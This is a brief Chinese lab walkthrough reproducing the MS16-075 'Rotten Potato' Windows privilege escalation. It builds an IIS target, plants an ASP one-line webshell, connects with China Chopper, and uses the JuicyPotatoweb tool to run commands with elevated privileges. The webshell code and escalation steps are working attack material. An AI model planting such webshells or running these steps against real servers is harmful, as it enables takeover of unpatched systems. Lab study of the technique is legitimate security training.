Windows-烂土豆提权

Windows-烂土豆提权

漏洞复现-烂土豆提权(MS16-075)

0x00 前言

烂土豆提权,即使用CVE-2016-3225(MS16-075)漏洞进行提权,当攻击者转发适用于在同一计算机上运行的其他服务的身份验证请求时,Microsoft 服务器消息块 (SMB) 中存在特权提升漏洞。成功利用此漏洞的攻击者可以使用提升的特权执行任意代码。攻击者登录系统后,运行一个经特殊设计的应用程序利用此漏洞,从而控制受影响的系统。

影响版本:Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012等,以上版本系统若未安装相应补丁,则大概率存在此漏洞。

靶机攻击机
操作系统Windows 10 Version 1903kali
IP地址192.168.12.140192.168.12.135
备注主机安装IIS 8.0,且已上传asp一句话木马

0x01 搭建靶场

Windows Server 2012

服务器管理器”->点击“添加角色和功能
在“服务器角色”中勾选“Web 服务器(IIS)”。
在“角色服务”中,展开“应用程序开发”,勾选“.NET Extensibility 4.5”、“ASP”等

打开默认站点所在的目录,一般为“C:\inetpub\wwwroot”,创建一个upload文件夹,并赋予相关权限。
在upload目录下创建shell.asp,内容为asp的一句话木马,此处直接模拟攻击者上传一句话木马。
 <%execute request("a")%>

0x02 漏洞复现

1、菜刀连接

2、打开虚拟终端,查看当前用户及用户权限。

 whoami
 whoami /priv

image-20230301215526859

此处发现其拥有SeImpersonate权限。

3、使用菜刀上传漏洞利用工具,使用WebShell版的JuicyPotato工具JuicyPotatoweb。

image-20230301215717945

4、在虚拟终端中,切换到upload目录,使用JuicyPotatoweb.exe执行如下命令进行提权。

 JuicyPotatoweb.exe -p "whoami"

image-20230301215902773

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值